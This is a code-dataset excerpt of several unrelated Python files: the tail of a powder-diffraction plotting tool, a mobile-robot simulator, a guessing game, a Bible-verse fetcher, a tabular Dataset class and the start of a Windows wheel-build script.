dest=\"bg_correct\",\n help=\"Starts background correction routine. Only the first pattern listed is corrected. Valid options: 'linear', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', or an integer specifying the order of the spline interpolator to use. Recommended: 'cubic'.\")\n\n parser.add_argument(\"--bin\", metavar='binsize',\n action=\"store\", type=float, dest=\"bin\",\n help=\"Bins the supplied patterns with the given bin size and prints the binned data sets.\")\n\n parser.add_argument(\"--compare\", metavar='x',\n action=\"store\", type=int, nargs='?', dest=\"compare\", const=1,\n help=\"Calculates similarity between data sets. For now, background needs to be removed manually beforehand. Sort by VAL: 1 = combined, 2 = spearman, 3 = kendall's tau, 4 = pearson.\")\n\n parser.add_argument(\"-m\", \"--monitor\", metavar='FILE',\n action=\"store\", type=str, dest=\"monitor\",\n help=\"Monitor specified file and replot if the file is updated. First 2 columns are plotted. Supports .prf files from FullProf. Special value: crplot.dat\")\n\n parser.add_argument(\"--topasbg\",\n action=\"store_true\", dest=\"topas_bg\",\n help=\"Generally applicable background correction procedure mainly for use with Topas. Reads x_ycalc.xy, x_ydiff.xy which can be output using macros Out_X_Ycalc(x_ycalc.xy) and Out_X_Difference(x_ydiff.xy). The background is reconstructed using the linear interpolation from --bgin. 
Recommended usage: lines pattern.xye -c linear --bgin bg_points.xy --topasbg\")\n\n parser.add_argument(\"-n\", \"--normalize\",\n action=\"store_true\", dest=\"normalize_all\",\n help=\"Normalize the values of all data sets by dividing by their integrated intensity\")\n\n group_xrs = parser.add_argument_group(\n 'XRS', description=\"Command line options specific to XRS-82\")\n\n group_xrs.add_argument(\"-x\", \"--xrs\", metavar='FILE',\n action=\"store\", type=str, nargs='?', dest=\"xrs\", const='stepco.inp',\n help=\"xrs stepco file to open and alter. Default = stepco.inp\")\n\n group_xrs.add_argument(\"--crplo\",\n action=\"store_true\", dest=\"crplo\",\n help=\"Mimics crplo -- plots observed, calculated and difference pattern and tick marks\")\n\n group_xrs.add_argument(\"--stepco\",\n action=\"store_true\", dest=\"stepco\",\n help=\"Shortcut for lines stepscan.dat -x stepco.inp. Additionally, plots the previous background and the background + the difference plot. Reads difference data from crplot.dat\")\n\n group_adv = parser.add_argument_group('Advanced options')\n\n group_adv.add_argument(\"-q\", \"--quiet\",\n action=\"store_true\", dest=\"quiet\",\n help=\"Don't plot anything and reduce verbosity.\")\n\n group_adv.add_argument(\"--tc\",\n action='store', type=int, dest=\"plot_ticks_col\", metavar='col',\n help=\"Which column to use for plotting of tick marks. First column = 1. Default = 3, for hkl.dat files\")\n\n parser.add_argument(\"-T\", \"--Ticks\",\n action='store', type=str, nargs='+', dest=\"plot_ticks_scaled\",\n help=\"Plots ticks scaled to the intensity. Expects .xy files with 2 columns, 2th/I\")\n\n parser.add_argument(\"--convert\",\n action='store', type=parse_wl, nargs='+', dest=\"convert_2theta\", metavar=\"WL\",\n help=\"Convert powder pattern to a different wavelength [wavelength_in wavelength_out]. If no diffraction pattern is given, the program will give a small summary for the wavelengths/energies provided\")\n\n group_adv.add_argument(\"--ref\", metavar='FILE',\n # action=\"store\", type=str, nargs='*',\n # dest=\"compare_reference\",\n action=\"store\", type=str, dest=\"compare_reference\",\n help=\"Reference pattern to check against all patterns for --compare\")\n\n group_adv.add_argument(\"--boxes\", metavar='FILE',\n action=\"store\", type=str, dest=\"boxes\",\n help=\"Plots boxes from data in given file. Format should be: 2theta_min, 2theta_max,intensity\")\n\n group_adv.add_argument(\"--savenpy\",\n action=\"store_true\", dest=\"savenpy\",\n help=\"Convert input data sets to numpy binary format for faster loading on next run (extension = .npy). Default = False.\")\n\n group_adv.add_argument(\"--smooth\",\n action=\"store\", type=str, dest=\"smooth\",\n help=\"Smooth data set according to smoothing algorithm given. Choice from: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman','savitzky_golay', 'moving_avg'.\")\n\n group_adv.add_argument(\"--peakdetect\",\n action=\"store\", type=int, nargs=2, dest=\"peakdetect\",\n help=\"Use peak detection algorithm\")\n\n group_adv.add_argument(\"--lw\", \"--linewidth\",\n action=\"store\", type=float, dest=\"linewidth\",\n help=\"Set linewidth of the plot\")\n\n group_adv.add_argument(\"--corrmat\",\n action=\"store\", type=str, dest=\"corrmat\",\n help=\"Plot given file as correlation matrix (expects ascii file with a n*m matrix). 
Can also take a Topas output file if a matrix has been generated with keyword C_matrix_normalized.\")\n\n group_adv.add_argument(\"--identify\",\n action=\"store\", type=float, dest=\"identify\",\n help=\"Identify given data sets against sets of d-spacings given by --reference\")\n\n group_adv.add_argument(\"--nobg\",\n action=\"store_false\", dest=\"backgrounder\",\n help=\"Turns off background module.\")\n\n group_adv.add_argument(\"--plot_esd\",\n action=\"store_true\", dest=\"plot_esd\",\n help=\"Plots observed intensities and esds for given xye file (expects 3 column data).\")\n\n group_adv.add_argument(\"--savefig\",\n action=\"store\", type=str, nargs='?', dest=\"savefig\", const='figure1.png',\n help=\"Saves figure as png instead of displaying it\")\n\n group_adv.add_argument(\"--fixsls\",\n action=\"store_true\", dest='fixsls',\n help=\"Fix SLS data sets and exit\")\n\n group_adv.add_argument(\"--rec3d\",\n action=\"store\", type=str, nargs='*', dest='rec3d',\n help=\"Plot the first 3 columns (h k l) of given file in 3d. If no filenames are given, 'args' are taken. If 2 files are given, the first should be the observed ones and the second should be the calculated ones.\")\n\n group_adv.add_argument(\"--capillary\",\n action=\"store\", type=str, dest='capillary',\n help=\"Give capillary file to be subtracted from the pattern.\")\n\n group_adv.add_argument(\"--uvw\", metavar=(\"U\", \"V\", \"W\"),\n action=\"store\", type=float, nargs=3, dest='plot_uvw',\n help=\"Plot FWHM = (U.tan(theta)^2 + V.tan(theta) + W)^0.5\")\n\n group_adv.add_argument(\"--wavelength\",\n action=\"store\", type=parse_wl, dest='wavelength',\n help=\"Specify the wavelength to use for the powder pattern generation. Default = 1.0 Angstrom\")\n\n group_adv.add_argument(\"--wyd\", \"--weighted_ydiff\",\n action=\"store_true\", dest='weighted_ydiff',\n help=\"Display weighted difference plot. 
Requires x_yobs.xy, x_ycalc.xy, x_yerr.xy\")\n\n parser.set_defaults(backgrounder=True,\n xrs=None,\n nomove=True,\n normalize_all=False,\n bg_correct=False,\n crplo=False,\n christian=False,\n monitor=None,\n plot_ticks=False,\n plot_ticks_col=1,\n stepco=False,\n topas_bg=False,\n compare=False,\n compare_reference=None,\n quiet=False,\n bg_input=None,\n bg_output=None,\n bg_offset=0,\n boxes=None,\n bin=None,\n # advanced options\n show=True,\n convert_2theta=None,\n linewidth=1.0,\n savenpy=False,\n smooth=False,\n peakdetect=False,\n corrmat=None,\n savefig=False,\n plot_esd=False,\n fixsls=False,\n rec3d=None,\n ipython=False,\n capillary=None,\n uvw=None,\n wavelength=1.0,\n # special\n weighted_ydiff=False,\n guess_filetype=True)\n\n options = parser.parse_args()\n\n if gui_options:\n for k,v in list(gui_options.items()):\n # print k,v\n setattr(options, k, v)\n\n args = options.args\n\n if options.stepco:\n options.xrs = 'stepco.inp'\n args = ['stepscan.dat']\n if options.bg_input:\n copyfile(options.bg_input, options.bg_input+'~')\n options.bg_output = options.bg_input\n\n Data.plot_range = options.plot_range\n\n if options.guess_filetype:\n prf = [arg for arg in args if arg.endswith('.prf')]\n for fn in prf:\n args.remove(fn)\n spc = [arg for arg in args if '.spc' in arg]\n for fn in spc:\n args.remove(fn)\n else:\n prf, spc = None, None\n\n if options.rec3d:\n print(options.rec3d, type(options.rec3d))\n if options.rec3d == 'args':\n plot_reciprocal_space(fnobs=args, fncalc=None)\n elif len(options.rec3d) == 1:\n plot_reciprocal_space(fnobs=options.rec3d[0], fncalc=None)\n elif len(options.rec3d) == 2:\n plot_reciprocal_space(\n fnobs=options.rec3d[0], fncalc=options.rec3d[1])\n\n else:\n raise ValueError\n exit()\n\n data = [read_data(fn, savenpy=options.savenpy, wl=options.wavelength)\n for fn in args] # returns data objects\n\n if options.capillary:\n capillary = read_data(options.capillary)\n smoothed = capillary.smooth(window='hanning', window_len=101)\n for d in data:\n print(f' >> Removing contribution of {options.capillary} from {d.filename}')\n f_bg_correct_out(\n d, smoothed.xy, kind=options.bg_correct, offset=0, suffix_corr='_rem_cap')\n exit()\n\n if options.plot_esd:\n data.extend([read_data(fn, usecols=(0, 2), suffix=' esd')\n for fn in args])\n if spc:\n data.extend([read_data(\n fn, usecols=(0, 2), suffix=' -DIFFaX', savenpy=options.savenpy) for fn in spc])\n\n if options.convert_2theta:\n if data:\n wl_in, wl_out = options.convert_2theta\n data = [d.convert_wavelength(wl_in, wl_out) for d in data]\n for d in data:\n d.print_pattern(tag=f'{wl_out:.2f}')\n else:\n for wl in options.convert_2theta:\n wavelength_info(wl)\n exit()\n\n if options.fixsls:\n fix_sls_data(data, quiet=options.quiet)\n exit()\n\n if options.corrmat:\n f = open(options.corrmat)\n corr, labels = get_correlation_matrix(f)\n plot_correlation_matrix(corr, labels)\n exit()\n\n if options.identify:\n if options.peakdetect:\n lookahead, noise = options.peakdetect\n else:\n lookahead, noise = None, None\n\n for d in data:\n f_identify(\n d, options.compare_reference, lookahead=lookahead, noise=noise)\n elif options.peakdetect:\n # options.show = False\n lookahead, noise = options.peakdetect\n for d in data:\n f_peakdetect(d, lookahead=lookahead, noise=noise)\n\n if options.xrs:\n fname = options.xrs\n copyfile(fname, fname+'~')\n f = read_file(fname)\n bg_data, options.xrs = parse_xrs(f)\n elif options.bg_input:\n try:\n bg_data = read_data(options.bg_input)\n except:\n bg_data = 
setup_interpolate_background(\n data[0], name=options.bg_input)\n else:\n bg_data = None\n\n fig = plt.figure()\n lines = Lines(fig, hide=options.quiet)\n lines.nomove = options.nomove\n lines.normalize = options.normalize_all\n lines.linewidth = options.linewidth\n lines.savefig = options.savefig\n\n if plt.get_backend() == 'TkAgg':\n # tight layout, smaller gray border\n fig.tight_layout(rect=(0, 0, 1, 1))\n\n if options.quiet or options.fixsls or options.monitor:\n pass\n elif options.bg_correct:\n if not bg_data:\n bg_data = setup_interpolate_background(data[0])\n bg = Background(fig, d=bg_data, bg_correct=options.bg_correct, quiet=options.quiet,\n out=options.bg_output, topas_bg=options.topas_bg, xrs=options.xrs)\n elif options.backgrounder:\n bg = Background(fig, d=bg_data, quiet=options.quiet,\n topas_bg=options.topas_bg, xrs=options.xrs)\n\n if options.crplo:\n f_crplo()\n\n if prf: # fullprof profile files\n for fn in prf:\n f_prf(fn)\n\n if options.compare:\n if options.compare_reference:\n ref = read_data(options.compare_reference)\n lines.plot(ref, lw=lines.linewidth*2)\n else:\n ref = None\n\n kind = options.compare-1\n f_compare(data, kind=kind, reference=ref)\n\n if options.plot_ticks_scaled:\n for fn in options.plot_ticks_scaled:\n d = read_data(fn, savenpy=False)\n lines.plot_ticks_scaled(d)\n\n if options.quiet:\n pass\n else:\n for d in reversed(data):\n lines.plot(d)\n\n if options.plot_uvw:\n d = calc_fwhm(options.plot_uvw)\n lines.plot(d)\n\n if options.plot_ticks:\n for i, hkl_file in enumerate(options.plot_ticks):\n col = 4 if options.plot_ticks == 'hkl.dat' else options.plot_ticks_col - \\\n 1\n ticks = load_tick_marks(hkl_file, col=col)\n if ticks:\n lines.plot_tick_marks(ticks, i=i)\n\n if options.weighted_ydiff:\n try:\n xyobs = read_data('x_yobs.xy')\n xycalc = read_data('x_ycalc.xy')\n xyerr = read_data('x_yerr.xy')\n except OSError as e:\n print(e)\n print()\n print(\"\"\"Please add the following lines to the TOPAS input file to generate the needed files:\n Out_X_Yobs(x_yobs.xy)\n Out_X_Ycalc(x_ycalc.xy)\n Out_X_Yerr(x_yerr.xy)\n \"\"\")\n exit(0)\n f_plot_weighted_difference(xyobs, xycalc, xyerr, lw=options.linewidth)\n\n if options.topas_bg:\n try:\n xyobs = read_data('x_yobs.xy')\n xycalc = read_data('x_ycalc.xy')\n xydiff = read_data('x_ydiff.xy')\n except OSError as e:\n print(e)\n print()\n print(\"\"\"Please add the following lines to the TOPAS input file to generate the needed files:\n Out_X_Yobs(x_yobs.xy)\n Out_X_Ycalc(x_ycalc.xy)\n Out_X_Difference(x_ydiff.xy)\n \"\"\")\n exit(0)\n\n f_plot_topas_special(\n xyobs, xycalc, xydiff, bg_data, lw=options.linewidth)\n # specifying bg.xycalc and bg.xyobs is necessary to update the Rp value\n # on every step\n bg.xycalc = xycalc\n bg.xyobs = data[0]\n\n if options.stepco:\n assert bg_data, \"No background data available, can't use option --stepco!\"\n\n lines.plot(bg_data)\n f_plot_stepco_special(bg_data.xy)\n\n if options.bin:\n for d in reversed(data):\n dbinned = d.bin(options.bin)\n dbinned.print_pattern()\n lines.plot(dbinned)\n\n if options.smooth:\n for d in reversed(data):\n dsmooth = d.smooth(options.smooth) # smoothing performed in place\n dsmooth.print_pattern()\n lines.plot(dsmooth)\n\n if options.boxes:\n lines.plot_boxes(options.boxes)\n\n if options.quiet or not options.show:\n pass\n elif not sys.stdin.isatty():\n plot_stdin(fig)\n elif options.monitor:\n if options.monitor in ('crplot.dat', 'crplot'):\n f_monitor('crplot.dat', crplot_init, crplot_update, fig=fig)\n elif 
options.monitor.endswith('.prf'):\n f_monitor(options.monitor, f_prf_init, f_prf_update, fig=fig)\n\n else:\n fn = options.monitor\n f_monitor(fn, plot_init, plot_update, fig=fig)\n elif options.savefig:\n plt.legend()\n out = options.savefig\n plt.savefig(out, bbox_inches=0)\n else:\n plt.legend()\n plt.show()\n\n if options.bg_correct:\n f_bg_correct_out(\n d=data[0], bg_xy=bg.xy.T, kind=options.bg_correct, offset=options.bg_offset)\n\n try:\n if bg.xy.any():\n drc = os.path.dirname(data[0].filename)\n bg.printdata(fout=os.path.join(drc,'lines.out'))\n except UnboundLocalError:\n pass\n\ndef main():\n if len(sys.argv) > 1 and sys.argv[1] == \"gui\":\n from . import lines_gui\n lines_gui.run()\n else:\n run_script()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stefsmeets/lines","sub_path":"lines/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":79205,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"31802993415","text":"import math\nimport numpy as np\n\n\nclass ClassRobot(object):\n def __init__(self, dt=0.002):\n self.dt = dt\n self.r = 0.05\n self.l = 0.09\n self.kr = 0.02\n self.kl = 0.02\n self.pose = np.array([0, 0, 0])\n self.pose_estimated = self.pose\n self.controller_pd = 1\n self.controller_pt = 10\n self.w_sat = 13\n self.estimated_Sigma = np.zeros((3, 3))\n\n def run(self, w_r, w_l):\n \"\"\"\n Simulate the real robot\n Args:\n w_r ([float]): [control signal angular velocity(rad/s) of right wheels]\n w_l ([float]): [control signal angular velocity(rad/s) of left wheels]\n Returns:\n None\n \"\"\"\n delta_distance = self.dt * self.r * (w_r + w_l) / 2\n delta_theta = self.dt * self.r * (w_r - w_l) / self.l\n theta = self.pose[2]\n J = (\n self.r\n * self.dt\n / 2\n * np.array(\n [\n [math.cos(theta), math.cos(theta)],\n [math.sin(theta), math.sin(theta)],\n [2 / self.l, -2 / self.l],\n ]\n )\n )\n Sigma = np.array([[self.kr * abs(w_r), 0], [0, self.kl * abs(w_l)]])\n Q = J @ Sigma @ J.T\n Noise = np.random.multivariate_normal(np.array([0, 0, 0]).T, Q, (1))\n Noise = Noise.reshape(3)\n\n self.pose = (\n self.pose\n + np.array(\n [\n math.cos(theta) * delta_distance,\n math.sin(theta) * delta_distance,\n delta_theta,\n ]\n )\n + Noise\n )\n\n def controller(self, goal):\n \"\"\"\n P controller\n Args:\n goal ([tuple]): [desired location (x,y)]\n Returns:\n dd ([float]): [distance error]\n w_r ([float]): [desired control signal of right wheels]\n w_l ([float]): [desired control signal of left wheels]\n \"\"\"\n dx = goal[0] - self.pose_estimated[0]\n dy = goal[1] - self.pose_estimated[1]\n dd = np.sqrt(dx ** 2 + dy ** 2)\n dtheta = math.atan2(dy, dx) - self.pose_estimated[2]\n dtheta = self._wrap_to_pi(dtheta)\n # if dtheta > math.pi:\n # dtheta = dtheta - 2 * math.pi\n # elif dtheta < -math.pi:\n # dtheta = dtheta + 2 * math.pi\n v_d = dd * self.controller_pd\n w_d = dtheta * self.controller_pt\n w_r = (v_d + self.l * w_d / 2) / self.r\n w_l = (v_d - self.l * w_d / 2) / self.r\n if w_r >= self.w_sat:\n rat = self.w_sat / w_r\n w_r = self.w_sat\n w_l = w_l * rat\n if w_l >= self.w_sat:\n rat = self.w_sat / w_l\n w_l = self.w_sat\n w_r = w_r * rat\n return dd, w_r, w_l\n\n def estimater(self, w_r, w_l):\n \"\"\"\n Location estimater\n Args:\n w_r ([float]): [control signal angular velocity(rad/s) of right wheels]\n w_l ([float]): [control signal angular velocity(rad/s) of left wheels]\n Returns:\n None\n \"\"\"\n delta_distance = self.dt * self.r * (w_r + w_l) / 2\n delta_theta = self.dt * 
self.r * (w_r - w_l) / self.l\n theta = self.pose_estimated[2]\n J = (\n self.r\n * self.dt\n / 2\n * np.array(\n [\n [math.cos(theta), math.cos(theta)],\n [math.sin(theta), math.sin(theta)],\n [2 / self.l, -2 / self.l],\n ]\n )\n )\n Sigma_delta = np.array([[self.kr * abs(w_r), 0], [0, self.kl * abs(w_l)]])\n Q = J @ Sigma_delta @ J.T\n H = np.array(\n [\n [1, 0, -delta_distance * math.sin(theta)],\n [0, 1, delta_distance * math.cos(theta)],\n [0, 0, 1],\n ]\n )\n\n self.estimated_Sigma = H @ self.estimated_Sigma @ H.T + Q\n self.pose_estimated = self.pose_estimated + np.array(\n [\n math.cos(theta) * delta_distance,\n math.sin(theta) * delta_distance,\n delta_theta,\n ]\n )\n self.pose_estimated[2] = self._wrap_to_pi(self.pose_estimated[2])\n\n def reset(self, dt=0.002):\n self.dt = dt\n self.r = 0.05\n self.l = 0.09\n self.kr = 0.01\n self.kl = 0.01\n self.pose = np.array([0, 0, 0])\n self.pose_estimated = self.pose\n self.controller_pd = 1\n self.controller_pt = 10\n self.w_sat = 13\n self.estimated_Sigma = np.zeros((3, 3))\n\n def _wrap_to_pi(self, theta):\n while theta > math.pi:\n theta = theta - 2 * math.pi\n while theta < -math.pi:\n theta = theta + 2 * math.pi\n return theta\n\n\nif __name__ == \"__main__\":\n robot = ClassRobot()\n # dt, w_r, w_l = robot.controller((1, 1))\n # robot.run(w_r, w_l)\n # while dt >= 0.1:\n # dt, w_r, w_l = robot.controller((1, 1))\n # robot.run(w_r, w_l)\n # robot.estimater(w_r, w_l)\n # print(robot.pose)\n # print(robot.pose_estimated)\n","repo_name":"gitAugust/Mobile_Robot_Simulator","sub_path":"model_mobile_robot.py","file_name":"model_mobile_robot.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41291465382","text":"from random import randint\r\nfrom time import sleep\r\n\r\ndef replay():\r\n i = input(\"Do you wish to play again? Type Y to continue or N to quit : \").lower()\r\n if i == \"y\":\r\n ti()\r\n else:\r\n sleep(2)\r\n exit()\r\n\r\ndef task(l , h):\r\n no = randint(l , h)\r\n chances = round((h+l)/2)\r\n print(f\"You have {chances} chances to find the number\")\r\n while chances != 0:\r\n chances -= 1\r\n print(f\"You have {chances} chances left\")\r\n try:\r\n guess = int(input(\"Guess the number : \"))\r\n except:\r\n print(\"Please enter numbers only\")\r\n chances += 1\r\n continue\r\n if guess == no:\r\n print(\"Congratulations !! \\n You Win !! \\n Do you wish to play again ?\")\r\n replay()\r\n elif no - guess >= 1 and no - guess <= 5:\r\n print(\"Too close\")\r\n elif guess - no >= 1 and guess - no <= 5:\r\n print(\"Too close\")\r\n elif chances == 0 and guess != no:\r\n print(f\"You lose!! \\n The number was {no} \\n Better luck next time... 
\\n Would you like to play again\")\r\n replay()\r\n else:\r\n print(\"That is not the number\")\r\n\r\ndef checking(l , h):\r\n if l == 0 and h == 0:\r\n print(\"Both the numbers cant be 0\")\r\n ti()\r\n elif l > h:\r\n print(\"Lower number cant be greater than higher number\")\r\n ti()\r\n elif l == h:\r\n print(\"Both the numbers cant be equal.\")\r\n ti()\r\n elif l < h and h - l == 10:\r\n task(l , h)\r\n elif l < h and h - l > 10:\r\n task(l , h)\r\n else:\r\n print(\"There should be minimum gap of 10 between higher and lower number\")\r\n ti()\r\n\r\ndef ti():\r\n ln = input(\"Enter the lower number : \")\r\n hn = input(\"Enter the higher number : \")\r\n if ln == \"\" and hn == \"\":\r\n print(\"Please enter some numbers\")\r\n ti()\r\n elif ln == \"\" and hn != \"\":\r\n ln = \"0\"\r\n elif ln != \"\" and hn == \"\":\r\n hn = \"0\"\r\n try:\r\n ln = int(ln)\r\n hn = int(hn)\r\n checking(ln , hn)\r\n except:\r\n print(\"You should only enter integer values\")\r\n\r\ndef wish():\r\n print(\"Welcome to guessing game !!\")\r\n print(\"In this game you have to provide the computer a range , then the computer will select a random number between that range , you have to guess number.\")\r\n ti()\r\n\r\nwish()\r\n","repo_name":"PrgrammerDSP/Number-Guessing-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9608225838","text":"import random\nimport requests\n'''\nfile to handle getting of bible verses\nupdate the list of possible verses in bible_verses.txt (1 per line)\n'''\n\ndef load_verses(filename):\n '''\n loads verses into a list from a file\n '''\n output = []\n with open(filename) as file:\n line = file.readline().strip()\n while line != \"\":\n output.append(line)\n line = file.readline().strip()\n return output\n\n\ndef get_verse(verse):\n '''\n actually queries the bible api thing to get the verse\n '''\n return requests.get(\"https://bible-api.com/{0}\".format(verse)).json()\n\ndef get_random_verse(filename):\n '''\n this is the useful function - gets a random verse from the file and returns it\n '''\n possible_verses = load_verses(filename)\n name = possible_verses[random.randint(0,len(possible_verses)-1)]\n return get_verse(name)\n","repo_name":"CWright2022/receipt_planner","sub_path":"bible_verses.py","file_name":"bible_verses.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22346080451","text":"from typing import Tuple, Sequence, Union\n\nimport numpy as np\nimport pandas as pd\n\n\nclass Dataset:\n def __init__(self, X: np.ndarray, y: np.ndarray = None, features: Sequence[str] = None, label: str = None) -> None:\n \"\"\"\n Dataset represents a tabular dataset for single output classification.\n\n Parameters\n ----------\n X: numpy.ndarray (n_samples, n_features)\n The feature matrix\n y: numpy.ndarray (n_samples, 1)\n The label vector\n features: list of str (n_features)\n The feature names\n label: str (1)\n The label name\n \"\"\"\n if X is None:\n raise ValueError(\"X cannot be None\")\n if y is not None and len(X) != len(y):\n raise ValueError(\"X and y must have the same length\")\n if features is not None and len(X[0]) != len(features):\n raise ValueError(\"Number of features must match the number of columns in X\")\n if features is None:\n features = [f\"feat_{str(i)}\" for i in range(X.shape[1])]\n if y is not 
None and label is None:\n label = \"y\"\n self.X = X\n self.y = y\n self.features = features\n self.label = label\n\n def shape(self) -> Tuple[int, int]:\n \"\"\"\n Returns the shape of the dataset\n Returns\n -------\n tuple (n_samples, n_features)\n \"\"\"\n return self.X.shape\n\n def has_label(self) -> bool:\n \"\"\"\n Returns True if the dataset has a label\n Returns\n -------\n bool\n \"\"\"\n return self.y is not None\n\n def get_classes(self) -> np.ndarray:\n \"\"\"\n Returns the unique classes in the dataset\n Returns\n -------\n numpy.ndarray (n_classes)\n \"\"\"\n if self.has_label():\n return np.unique(self.y)\n else:\n raise ValueError(\"Dataset does not have a label\")\n\n def get_mean(self) -> np.ndarray:\n \"\"\"\n Returns the mean of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmean(self.X, axis=0)\n\n def get_variance(self) -> np.ndarray:\n \"\"\"\n Returns the variance of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanvar(self.X, axis=0)\n\n def get_median(self) -> np.ndarray:\n \"\"\"\n Returns the median of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmedian(self.X, axis=0)\n\n def get_min(self) -> np.ndarray:\n \"\"\"\n Returns the minimum of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmin(self.X, axis=0)\n\n def get_max(self) -> np.ndarray:\n \"\"\"\n Returns the maximum of each feature\n Returns\n -------\n numpy.ndarray (n_features)\n \"\"\"\n return np.nanmax(self.X, axis=0)\n\n def summary(self) -> pd.DataFrame:\n \"\"\"\n Returns a summary of the dataset\n Returns\n -------\n pandas.DataFrame (n_features, 5)\n \"\"\"\n data = {\n \"mean\": self.get_mean(),\n \"median\": self.get_median(),\n \"min\": self.get_min(),\n \"max\": self.get_max(),\n \"var\": self.get_variance()\n }\n return pd.DataFrame.from_dict(data, orient=\"index\", columns=self.features)\n\n#Exercise 2.1\n\n def dropna (self):\n\n identificar = np.all(~np.isnan(self.X), axis=1) # np.isnan(self.X) gives a boolean array where True marks NA values, but the ~ inverts the logic, so NA positions become False. Overall, the expression yields a boolean mask that is True for the rows without any NA.\n self.X = self.X[identificar] #New matrix keeping the rows where identificar is True. The False rows are removed\n self.y = self.y[identificar] #Remove the labels of the samples whose rows were removed.\n\n return self\n\n#Exercise 2.2\n\n def fillna (self, valor):\n identificar = np.isnan(self.X) #Boolean array in which NA values are marked as True.\n\n if valor == \"mean\":\n média = np.nanmean(self.X, axis=0) #compute the mean, ignoring NA values\n self.X = np.where(identificar, média, self.X) # identificar is the boolean matrix whose True entries are replaced by the mean. self.X is the original matrix; where the element is False, the value is kept\n\n elif valor == \"median\":\n mediana = np.nanmedian(self.X, axis=0) #compute the median, ignoring NA values\n self.X = np.where(identificar, mediana, self.X) # replace the True values with the median\n\n else:\n self.X[identificar] = valor\n\n return self\n \n#Exercise 2.3\n \n def remove_by_index (self, index):\n self.X = np.delete(self.X, index, axis = 0) #the row corresponding to the index is removed. Here axis = 0 means rows and axis = 1 means columns\n self.y = np.delete(self.y, index) #the label corresponding to this row (sample) is removed\n return self\n\n @classmethod\n def from_dataframe(cls, df: pd.DataFrame, label: str = None):\n \"\"\"\n Creates a Dataset object from a pandas DataFrame\n\n Parameters\n ----------\n df: pandas.DataFrame\n The DataFrame\n label: str\n The label name\n\n Returns\n -------\n Dataset\n \"\"\"\n if label:\n X = df.drop(label, axis=1).to_numpy()\n y = df[label].to_numpy()\n else:\n X = df.to_numpy()\n y = None\n\n features = df.columns.tolist()\n return cls(X, y, features=features, label=label)\n\n def to_dataframe(self) -> pd.DataFrame:\n \"\"\"\n Converts the dataset to a pandas DataFrame\n\n Returns\n -------\n pandas.DataFrame\n \"\"\"\n if self.y is None:\n return pd.DataFrame(self.X, columns=self.features)\n else:\n df = pd.DataFrame(self.X, columns=self.features)\n df[self.label] = self.y\n return df\n\n @classmethod\n def from_random(cls,\n n_samples: int,\n n_features: int,\n n_classes: int = 2,\n features: Sequence[str] = None,\n label: str = None):\n \"\"\"\n Creates a Dataset object from random data\n\n Parameters\n ----------\n n_samples: int\n The number of samples\n n_features: int\n The number of features\n n_classes: int\n The number of classes\n features: list of str\n The feature names\n label: str\n The label name\n\n Returns\n -------\n Dataset\n \"\"\"\n X = np.random.rand(n_samples, n_features)\n y = np.random.randint(0, n_classes, n_samples)\n return cls(X, y, features=features, label=label)\n\n\nif __name__ == '__main__':\n X = np.array([[1, 2, 3], [4, np.nan, np.nan],[5, 10, 3]])\n y = np.array([1, 2,3])\n features = np.array(['a', 'b', 'c'])\n label = 'y'\n dataset = Dataset(X, y, features, label)\n\n#How the data is organized\n\n # a | b | c | y\n #-----|-----|-----|-----\n # 1 | 2 | 3 | 1\n # 4 | NA | NA | 2 \n # 5 | 10 | 3 | 3 \n\n print(dataset.X.shape[0])\n print()\n print(dataset.has_label())\n print(\"Class:\", dataset.get_classes())\n print(dataset.get_mean())\n print(dataset.get_variance())\n print(dataset.get_median())\n print(dataset.get_min())\n print(dataset.get_max())\n print(dataset.summary())\n print()\n # dataset.dropna()\n # dataset.fillna(5)\n # print(dataset.remove_by_index(0))\n print(dataset.X)\n print(dataset.y) #Get the labels of the samples\n\n \n \n","repo_name":"luisfsferreira/Sistemas_inteligentes","sub_path":"src/si/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"14751761294","text":"from subprocess import check_call\nimport os\nimport sys\n\nSCRIPT_DIR = os.path.dirname(__file__)\nROOT_DIR = os.path.abspath(os.getcwd())\n\n\nprint(\"SCRIPT_DIR: %s\" % SCRIPT_DIR)\nprint(\"ROOT_DIR: %s\" % ROOT_DIR)\n\nsys.path.insert(0, os.path.join(SCRIPT_DIR, \"internal\"))\n\nfrom wheel_builder_utils import push_dir, push_env\nfrom windows_build_common import DEFAULT_PY_ENVS, venv_paths\n\ndef build_wheels(py_envs=DEFAULT_PY_ENVS):\n for py_env in py_envs:\n python_executable, \\\n python_include_dir, \\\n python_library, \\\n pip, \\\n ninja_executable, \\\n path = venv_paths(py_env)\n\n with push_env(PATH=\"%s%s%s\" % (path, os.pathsep, os.environ[\"PATH\"])):\n\n # Install dependencies\n requirements_file = os.path.join(ROOT_DIR, \"requirements-dev.txt\")\n if os.path.exists(requirements_file):\n check_call([pip, \"install\", \"--upgrade\", \"-r\", 
